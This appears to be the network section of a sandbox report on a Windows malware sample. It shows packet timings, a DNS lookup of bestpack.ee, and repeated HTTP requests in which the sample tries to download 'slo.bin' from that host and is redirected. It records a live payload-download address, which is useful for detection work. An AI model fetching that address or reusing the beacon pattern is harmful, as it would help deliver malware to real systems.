                                                                                                                      Sep 27, 2024 19:03:54.744996071 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:54.960335016 CEST8049814185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:54.960485935 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:54.960576057 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:54.961606026 CEST8049812185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.175947905 CEST8049814185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.177107096 CEST8049814185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.177443981 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.178066015 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.178102016 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.178298950 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.178575993 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.178596020 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.616866112 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.617119074 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.617470026 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.617486000 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:55.617603064 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:55.617614031 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:56.071480989 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:56.071567059 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:03:56.071732044 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:56.071732998 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:56.072001934 CEST49815443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:03:56.072024107 CEST44349815185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:05.186350107 CEST8049814185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:05.186516047 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.101617098 CEST4981480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.101835012 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.317164898 CEST8049814185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.319174051 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.319314003 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.319405079 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.536470890 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.538369894 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.538561106 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.538870096 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.538902998 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.539012909 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.539249897 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.539267063 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.983448029 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.983591080 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.983875990 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.983887911 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:06.983983040 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:06.983992100 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424452066 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424530983 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:07.424684048 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:07.424967051 CEST49817443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:07.424982071 CEST44349817185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:16.547688007 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:16.547841072 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:16.848079920 CEST4981680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.067008972 CEST8049816185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.458482027 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.684068918 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.684254885 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.684366941 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.913430929 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.913446903 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.913613081 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914048910 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914073944 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:17.914242983 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914468050 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:17.914478064 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.354218960 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.354347944 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.354971886 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.354979038 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.355130911 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.355142117 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789371014 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789422989 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:18.789578915 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.789838076 CEST49819443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:18.789851904 CEST44349819185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:27.916500092 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:27.916691065 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:28.815085888 CEST4981880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:28.815296888 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.031224012 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.031429052 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.031594038 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.033303022 CEST8049818185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.251674891 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.252845049 CEST8049820185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.253065109 CEST4982080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253407001 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253428936 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.253587008 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253851891 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.253863096 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.702013969 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.702322960 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.702676058 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.702686071 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:29.703028917 CEST49821443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:04:29.703037977 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:30.139929056 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:04:30.139991999 CEST44349821185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.115964890 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116404057 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116421938 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.116466999 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.116480112 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563513994 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563714981 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.563782930 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:49.563926935 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.564022064 CEST49835443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:49.564083099 CEST44349835185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:58.679290056 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:58.679620981 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.575372934 CEST4983480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.575521946 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.791135073 CEST8049834185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:59.791949987 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:05:59.792130947 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:05:59.792244911 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.008724928 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.009735107 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.010143042 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010351896 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010459900 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.010670900 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010869980 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.010936022 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457030058 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457236052 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457493067 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457528114 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.457758904 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.457801104 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.892707109 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.892941952 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893038988 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.893089056 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:00.893260002 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893335104 CEST49837443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:00.893393993 CEST44349837185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:10.019995928 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:10.020132065 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:10.901071072 CEST4983680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:10.901165962 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.117243052 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.117470980 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.117588043 CEST8049836185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.117706060 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.333532095 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.334454060 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.334815979 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335274935 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335365057 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.335588932 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335767031 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.335825920 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.788096905 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.788405895 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788729906 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788744926 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.788948059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788963079 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.229798079 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.229994059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230056047 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.230108976 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.230204105 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230205059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230412006 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230465889 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:21.344482899 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:21.344788074 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.242136002 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.242371082 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.458448887 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.460381985 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.460609913 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.460724115 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.678495884 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.679668903 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.679871082 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680181026 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680294037 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.680461884 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680629969 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680675030 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.128465891 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.128801107 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.130997896 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.131052017 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.131331921 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.131373882 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564488888 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564639091 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564699888 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564826965 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564867020 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564910889 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564934015 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564960957 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:32.689629078 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:32.690001965 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.567750931 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.567842007 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.785505056 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:33.787761927 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:33.787993908 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.788108110 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.007947922 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.009402990 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.009848118 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010171890 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010294914 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.010550022 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010725021 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010771990 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.455806971 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.456001043 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456398010 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456439972 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.456548929 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456590891 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894159079 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894368887 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894450903 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894531012 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894622087 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894696951 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894696951 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:35.206768990 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:35.206847906 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:44.015079975 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:44.015326023 CEST4984280192.168.11.20185.86.211.137
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Sep 27, 2024 18:58:46.861701965 CEST | 60252 | 53 | 192.168.11.20 | 1.1.1.1 |
| Sep 27, 2024 18:58:47.310432911 CEST | 53 | 60252 | 1.1.1.1 | 192.168.11.20 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 27, 2024 18:58:46.861701965 CEST | 192.168.11.20 | 1.1.1.1 | 0xf08f | Standard query (0) | bestpack.ee | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 27, 2024 18:58:47.310432911 CEST | 1.1.1.1 | 192.168.11.20 | 0xf08f | No error (0) | bestpack.ee | | 185.86.211.137 | A (IP address) | IN (0x0001) | false |
                                                                                                                      • bestpack.ee
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49760 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe |

Timestamp: Sep 27, 2024 18:58:47.534271955 CEST
Bytes transferred: 163
Direction: OUT
Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 18:58:47.751358986 CEST
Bytes transferred: 427
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 16:58:47 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 1 | Source IP: 192.168.11.20 | Source Port: 49762 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:58:58.966526031 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:58:59.185018063 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 2 | Source IP: 192.168.11.20 | Source Port: 49764 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:59:10.338602066 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:59:10.556744099 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:10 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 3 | Source IP: 192.168.11.20 | Source Port: 49766 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:59:21.714462996 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:59:21.935507059 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:21 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 4 | Source IP: 192.168.11.20 | Source Port: 49768 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:59:33.103394032 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:59:33.325213909 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:33 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
